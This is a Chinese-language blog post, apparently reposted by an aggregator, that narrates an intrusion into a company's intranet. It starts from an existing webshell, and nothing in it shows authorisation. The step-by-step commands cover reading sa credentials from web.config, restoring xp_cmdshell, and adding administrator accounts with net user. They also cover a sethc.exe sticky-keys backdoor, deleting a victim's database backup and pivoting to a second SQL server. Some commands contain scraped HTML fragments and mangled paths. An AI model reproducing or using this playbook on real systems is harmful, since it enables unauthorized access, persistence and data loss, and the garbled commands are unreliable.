圖文：udb311

主題：MSSQL內網滲透案例分析

發表：黑白前線

描述：對于內網滲透技術一直感覺很神秘，手中正巧有一個webshell是內網服務器。借此機會練習下內網入侵滲透技術！本文敏感信息以屏蔽！密碼都以*號代替。此次過程主要運用到xp_cmdshell恢復與執行，再通過自己的靈活思維運用。

環境：2003 SERVER

IIS ：6.0 支持php

數據庫：MSSQL和MYSQL

網站類型：ASPX

本文重點講述內網滲透提權部分，對于WEBSHELL不在描述。對于了解入侵滲透的朋友都知道，拿到webshell后服務器能否提權就要先找提權 的漏洞所在。從本站的角度來看，存在MSSQL、MYSQL支持ASPX和PHP可以說權限夠大的了。先來看看目錄能窮舉出來哪些東西。先看程序目錄，很 平常么。沒現有SU和MYSQL之類的信息。

E：盤可以瀏覽

F：盤可以瀏覽

本站ASPX 類型網站，使用的是MSSQL數據庫。顯示密碼不是最高權限的用戶，就是是個DB用戶提權也不能馬上到手。

再翻翻別的站點，目錄可以瀏覽一個個找吧。發現一個目錄web.config有SA用戶

連接數據庫信息：

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****" 打開aspxspy，使用database連接功能。

登錄成功，顯示SA看來應該沒有降權。

連接狀態是MSSQL 2005，要先啟xp_cmdshell.

接著執行下命令"whoami.html' target='_blank'>whoami"

good，system 權限，下面就是添加一個賬號了。。

Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否開啟

Exec master.dbo.xp_cmdshell 'stat.html' target='_blank'>netstat -ano'

OK,狀態正常。

Exec master.dbo.xp_cmdshell 'ipconfig /all'顯示配置是內網IP

通過域名解析到的IP連接3389，可以連接。

說明管理做了端口映射，這就不要轉發端口了。省了很多功夫！

這才拿到了一臺服務器的權限，從網站的SQL連接上不難發現內網還有SQL服務器。

滲透繼續……

內網IP為200，同樣是MSSQL SA權限。

再利用aspxspy 數據庫連接，

郁悶的事情發生了，不能連接。

[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒絕訪問。

按道理講數據庫能使用的情況下應該可以成功連接上的，難道沒有配置TCP/IP訪問數據庫？疑問產生了，無耐之下通過3389上到服務器上來試試。服務器安裝了MSSQL，有查詢分析器和企業管理器。這又成了我們的工具。呵呵！

SQL分析器連接之，仍然無法連接。

先測試下所在的MSSQL服務器機器的存在性。

成功響應，說明服務器存在。

運行mstsc試著3389連接下，顯示了一個xp的界面。比較郁悶耶。

試下名稱解析服務。。。

點擊瀏覽一看，這么多MSSQL服務器名還真不知道哪臺是的。觀察下發現200和IP200的機器有些相近。輸入SA及密碼。

成功返回查詢窗口。試下xp_cmdshell

發現不存在，恢復之

Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

OK！

執行命令"whoami",雖然XP不支持whoami命令。

exec xp_cmdshell 'net user 123 123 /add'

提示系統錯誤。不是沒權限添加。。。。不明真像了。。。

思路：開了3389可以用sethc.exe 替換來。。。

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替換之？

問題又來了，提示磁盤文件不足。

利用xp_dirtree查看下C盤

EXEC MASTER..XP_dirtree 'c:',1,1

列出文件目錄，刪除一個數據庫的備份

再執行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

提示一個文件被復制，說明成功。3389 5次shift未彈出。

再試下

exec xp_cmdshell 'net user 123 123 /add' 提示成功。原來開始是空間不足導致的系統錯誤啊。真像揭開！

exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登錄之。。

exec xp_cmdshell 'net user 123 /del'刪除用戶

內網還存在很多機器，此次滲透就此結束。。。

總結：內網從端口轉發到外部連接，再從3389登錄內部3389 跟跳板技術差不多。

總結

以上是生活随笔為你收集整理的内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。